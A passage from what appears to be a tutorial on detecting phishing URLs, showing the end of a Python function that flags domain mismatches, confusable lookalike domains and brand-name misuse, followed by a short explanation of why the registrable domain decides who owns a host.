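    reg = registrable_domain(host)
    legit = {d.lower() for d in legit_domains}
    if reg not in legit:
        findings.append(("domain-mismatch", "%s is not a known %s domain" % (reg, brand)))
        if unconfuse(reg) in legit:
            findings.append(("confusable", "%s imitates %s" % (reg, unconfuse(reg))))
        elif brand.lower() in host or brand.lower() in parts.path.lower():
            findings.append(("brand-lookalike", "brand name used outside its own domain"))
    return findings
```

    The registrable-domain comparison is the heart of it: apple.com.verify-account.example is owned by whoever owns verify-account.example, no matter how the left-hand labels read, and that is the check a user can do by eye once they know to look at the right end of the host name.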
